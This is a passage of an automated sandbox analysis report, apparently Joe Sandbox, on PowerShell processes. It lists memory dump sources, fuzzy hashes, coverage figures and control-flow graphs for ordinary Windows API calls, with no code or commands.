                                                                                                                  • Instruction ID: ca032ec52dc8fb9fa8c63379f6a4f21b53f277186ce2bd6943879880be5a9b36
                                                                                                                  • Opcode Fuzzy Hash: 490c33984a3d34d6bdbd48a4eefaffd3e34c7bc06e0b59dc01fcd8ec4da1f06d
                                                                                                                  • Instruction Fuzzy Hash: E8412B2160DBC50FE39A9F2C68417A23BE2DF5B354B0640FED59DCB2A3C9199C46C752
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2095923331.00007FF9BB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb3f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11e160439e86e104263ccf83f86d3b55e9f7e2a9e47f5c7202be4babe487ab5e
                                                                                                                  • Instruction ID: bcf8d008e7baa9cbec178224cf0f8a92c3f9ce6d0e681711812af77dfbee19e0
                                                                                                                  • Opcode Fuzzy Hash: 11e160439e86e104263ccf83f86d3b55e9f7e2a9e47f5c7202be4babe487ab5e
                                                                                                                  • Instruction Fuzzy Hash: 2241C531A08A064FEB94EF288454BBA73E2FFD5314F444076D90DC72E2CE69BD418780
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 70e5373137b4b9ecd2ba342814ed18359c390da3b017f625803b6ae018611bd2
                                                                                                                  • Instruction ID: e9fb80fb0cefc33324c3e3c76836f818aeb479eabbf3f4a21e2d5e8cb33e4ec4
                                                                                                                  • Opcode Fuzzy Hash: 70e5373137b4b9ecd2ba342814ed18359c390da3b017f625803b6ae018611bd2
                                                                                                                  • Instruction Fuzzy Hash: BF31C53160C9194FD794EB2C9858B7677E1EB99321F1942BBD40DC72A2DD25EC81C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a1907a1c6bf81b98a41cd49bc9f7b71aef792d82583562adce6c0645e1f72184
                                                                                                                  • Instruction ID: 91badc08823720712d79fbaf99df17b3315bd1a8af5216c1b03fe8718d847d09
                                                                                                                  • Opcode Fuzzy Hash: a1907a1c6bf81b98a41cd49bc9f7b71aef792d82583562adce6c0645e1f72184
                                                                                                                  • Instruction Fuzzy Hash: AE31137091CB844FE7569F2988516B67BE0EF96300F4501BEE48ACB193CA28E546C7A2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e21b66b01146e2ab9c8256c3269dea73086eb2e90b59ccc3268e1211b0647234
                                                                                                                  • Instruction ID: a114bcca00a19e5a32bb73b962abadea8bee10e675f623adc0632590767f148d
                                                                                                                  • Opcode Fuzzy Hash: e21b66b01146e2ab9c8256c3269dea73086eb2e90b59ccc3268e1211b0647234
                                                                                                                  • Instruction Fuzzy Hash: 0D313C316189198FEB98EF2CC8657A473D1FF99314F5441B9D04EC72D6CE74A982CB41
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 99305635f13df4905f387ff0445d8fb96d63c1cd0f2829b5d25c773ce01879ca
                                                                                                                  • Instruction ID: 98f3b843c78f76b64edbb41112c6d05336152e94b60a2fc96e93af30e11803b7
                                                                                                                  • Opcode Fuzzy Hash: 99305635f13df4905f387ff0445d8fb96d63c1cd0f2829b5d25c773ce01879ca
                                                                                                                  • Instruction Fuzzy Hash: 1631E821A08A474FEBAADB3998943B527E1EF59354F4540BAD40DCF2E2DD1CDA40C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5edf191068f3948b257cbf6c3472ca0ea6c568308b29e21842367811a5bcb32c
                                                                                                                  • Instruction ID: 276a96e4584af1b5eedcfa77d04f362d7f602bf71ff476b3a515edf83315d468
                                                                                                                  • Opcode Fuzzy Hash: 5edf191068f3948b257cbf6c3472ca0ea6c568308b29e21842367811a5bcb32c
                                                                                                                  • Instruction Fuzzy Hash: CD310331D1CA8A4FDB81EF68C854BEA7BE0FF59714F0501AAE04DC71D2CA78A9058B80
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cbb1b53350ecd22e25da923ee1e3e866f7997606516ea6cd560af15f89ccece7
                                                                                                                  • Instruction ID: 66ef229f3c04fbb473f2e61e9072283d12a3ad8964f0099a322319d159117ce9
                                                                                                                  • Opcode Fuzzy Hash: cbb1b53350ecd22e25da923ee1e3e866f7997606516ea6cd560af15f89ccece7
                                                                                                                  • Instruction Fuzzy Hash: 60318F30609E064FDB99EB2C84A5B75B7E2FF9930170505BED40EC76A2CEA9F8418B00
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5d54f93cb02095161f0d61eb4f7adebfb99ab14985bc0ac7a22fad7c012c547e
                                                                                                                  • Instruction ID: 69f3a675c614cd357026debcfa1f35b658ad68a062f218fd53a2cce847a9e864
                                                                                                                  • Opcode Fuzzy Hash: 5d54f93cb02095161f0d61eb4f7adebfb99ab14985bc0ac7a22fad7c012c547e
                                                                                                                  • Instruction Fuzzy Hash: C731AF3150CA4C9FDB49DFA8C849BE9BBF4FB96320F0441AFD049C3562D764A856CB51
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 35158ea361206de748ffff2c7edb13b9a8ae5b35d1ba8b4065e5e20553e6085a
                                                                                                                  • Instruction ID: a88489e168800e6a3c2a98e6ca8001d551bc70f6c28b3f9c4c2cfc2f71849a77
                                                                                                                  • Opcode Fuzzy Hash: 35158ea361206de748ffff2c7edb13b9a8ae5b35d1ba8b4065e5e20553e6085a
                                                                                                                  • Instruction Fuzzy Hash: 5221EE22A1CE560BE668EB1CA4157B973E1FF86720F0045BEE08FC36D7CE59BD028644
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 25f7596e5982e79cb810b4c976daef1fcbf0486683803766136233787f613305
                                                                                                                  • Instruction ID: 5c7aa910580fa35a913eb90db3d86897bc4ac6db00b5a9b72413977c187e7a2d
                                                                                                                  • Opcode Fuzzy Hash: 25f7596e5982e79cb810b4c976daef1fcbf0486683803766136233787f613305
                                                                                                                  • Instruction Fuzzy Hash: D5215E31E18E1D4FEB90EE6C94456E9B7E1FBAC311F54453AE40ED32A1DA74B8418B40
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d8ac58068610fc94daf2799aa81a686c419ed1010c42432cf112d57c3b460045
                                                                                                                  • Instruction ID: 31e75642d25bc4378dc1b0749abb87a4d1192d3213f6d64316dba036186ab497
                                                                                                                  • Opcode Fuzzy Hash: d8ac58068610fc94daf2799aa81a686c419ed1010c42432cf112d57c3b460045
                                                                                                                  • Instruction Fuzzy Hash: 3621483090DB864FD306DB288850BA57BE1EF46364F4902FAD448CB2E3DD68B945C791
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 92f2287c9b4b402784cfd4d91b49e4ce878326f8ca12a9e6fe16ddc005018367
                                                                                                                  • Instruction ID: f2c193693c0f831f5e5aca9dbfcabe8d0250e1f778e0ceb5bd689ce182e1cccc
                                                                                                                  • Opcode Fuzzy Hash: 92f2287c9b4b402784cfd4d91b49e4ce878326f8ca12a9e6fe16ddc005018367
                                                                                                                  • Instruction Fuzzy Hash: CE21A121B1CA0A4BD758EF1DA04166AB3E1FB94310F404639E45EC32E7DEA4F9418B46
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c8d4a5104b645337f9e65c4cba69082ff8514577f5d506167bc706a5f05029d1
                                                                                                                  • Instruction ID: ff0d842c4637cad2ced2a410f5a8dc3e3ba3012ad8d5df7c3bf5d52a4148dc21
                                                                                                                  • Opcode Fuzzy Hash: c8d4a5104b645337f9e65c4cba69082ff8514577f5d506167bc706a5f05029d1
                                                                                                                  • Instruction Fuzzy Hash: 4D11033290DB9A4FCF96DF2898506EA7BB0FF56310B0405FFE589C7192DA34A915CB90
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8299ceb9ace4f78b1869326eea5c20f6a20aab76a3824f65213b2d2523abd2cd
                                                                                                                  • Instruction ID: c1934210d0f478e5397ffa378195adebb4dd5e2ae349cc598480576266333ba1
                                                                                                                  • Opcode Fuzzy Hash: 8299ceb9ace4f78b1869326eea5c20f6a20aab76a3824f65213b2d2523abd2cd
                                                                                                                  • Instruction Fuzzy Hash: 7E01E102E2CD9D0FF7A4EE3C589A2B45BC2EB9A154B4441F6E80CCB2E7EC58AC460241
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d225680be098d22fddec301e863171cbc92f245df876693870e3e58c49ac7be0
                                                                                                                  • Instruction ID: a9a562b8e1fe7ab89a5780917288810aa9bdbe2352097009795904aa28f8285f
                                                                                                                  • Opcode Fuzzy Hash: d225680be098d22fddec301e863171cbc92f245df876693870e3e58c49ac7be0
                                                                                                                  • Instruction Fuzzy Hash: 4F216D31919A9A8FDB99EF28C8547A577A2FF58300F1409BDE04EC72E6CA35B811CB40
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1c1c7a22d8f05604667e71a48322bc2c365cbd44ae782de884d0457929c47192
                                                                                                                  • Instruction ID: 116d13962ae8ee2271a1fa7c2cec6d71923aa340ebd123b585cf16eab2fffa68
                                                                                                                  • Opcode Fuzzy Hash: 1c1c7a22d8f05604667e71a48322bc2c365cbd44ae782de884d0457929c47192
                                                                                                                  • Instruction Fuzzy Hash: FE11D321D0D7821FE796CB3C94557E17BE0BF42624F9802FAD14CCA0F2CAADBA468201
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2126238344.00007FF9BB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB770000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb770000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +$.$E$G$K$M$P$T$X$e$g$k$m$p$t$x
                                                                                                                  • API String ID: 0-691191535
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2095923331.00007FF9BB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb3f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *$?$[$]$`
                                                                                                                  • API String ID: 0-4132509962
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:54
                                                                                                                  Total number of Limit Nodes:3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 436 7ff9baf5395d-7ff9baf53979 437 7ff9baf5397b 436->437 438 7ff9baf5397c-7ff9baf53a71 436->438 437->438 443 7ff9baf53a7e-7ff9baf53adc IdentifyCodeAuthzLevelW 438->443 444 7ff9baf53a73-7ff9baf53a7b 438->444 445 7ff9baf53ade 443->445 446 7ff9baf53ae4-7ff9baf53b38 call 7ff9baf53b39 443->446 444->443 445->446
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1431151113-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 463 7ff9baf47d6e-7ff9baf47d7b 464 7ff9baf47d7d-7ff9baf47d85 463->464 465 7ff9baf47d86-7ff9baf47d97 463->465 464->465 466 7ff9baf47d99-7ff9baf47da1 465->466 467 7ff9baf47da2-7ff9baf47e2f 465->467 466->467 471 7ff9baf47e39-7ff9baf47e78 GetThreadPreferredUILanguages 467->471 472 7ff9baf47e31-7ff9baf47e36 467->472 473 7ff9baf47e7a 471->473 474 7ff9baf47e80-7ff9baf47eab 471->474 472->471 473->474
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LanguagesPreferredThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 842807343-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 31276548-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 497 7ff9baf46760-7ff9baf47e2f 502 7ff9baf47e39-7ff9baf47e78 GetThreadPreferredUILanguages 497->502 503 7ff9baf47e31-7ff9baf47e36 497->503 504 7ff9baf47e7a 502->504 505 7ff9baf47e80-7ff9baf47eab 502->505 503->502 504->505
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 506 7ff9baf4a050-7ff9baf4a063 508 7ff9baf4a06e 506->508 509 7ff9baf4a065-7ff9baf4a06b 506->509 510 7ff9baf55dc0-7ff9baf55e6c ComputeAccessTokenFromCodeAuthzLevel 508->510 509->510 513 7ff9baf55e6e 510->513 514 7ff9baf55e74-7ff9baf55ea3 510->514 513->514
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132034935-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 516 7ff9baf55da3-7ff9baf55e14 519 7ff9baf55e1c-7ff9baf55e6c ComputeAccessTokenFromCodeAuthzLevel 516->519 520 7ff9baf55e6e 519->520 521 7ff9baf55e74-7ff9baf55ea3 519->521 520->521
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132034935-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 523 7ff9baf48f11-7ff9baf48f1d 524 7ff9baf48f1f 523->524 525 7ff9baf48f21-7ff9baf48f5a 523->525 524->525 526 7ff9baf48f61-7ff9baf48f88 524->526 525->526 528 7ff9baf48f8a-7ff9baf48f8f 526->528 529 7ff9baf48f92-7ff9baf48fc4 GetFileAttributesW 526->529 528->529 530 7ff9baf48fcc-7ff9baf48ff1 529->530 531 7ff9baf48fc6 529->531 531->530
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  • Opcode Fuzzy Hash: ea06507e52e78e5f6c10945dc6ebfba3df44a7dbf7270a84afd739e3cd8c35ed
                                                                                                                  • Instruction Fuzzy Hash: 0351033180DA854FE316DB3898113A57FA0FF06314B0941FED188CB5E3DAAAB985C752
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 01e2fafad8a3aa0cf2923a35a10ed5e2471da565579b7af49679f8327c3b6030
                                                                                                                  • Instruction ID: cfe0220a825121f95a78d3e1d8222b1417848a63bca4891dfa3605e235446fcb
                                                                                                                  • Opcode Fuzzy Hash: 01e2fafad8a3aa0cf2923a35a10ed5e2471da565579b7af49679f8327c3b6030
                                                                                                                  • Instruction Fuzzy Hash: EE418E3160DA894FDB85EB2C8458E647BE1EF9A31170940FAD04DCB1F7DA69EC85CB41
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
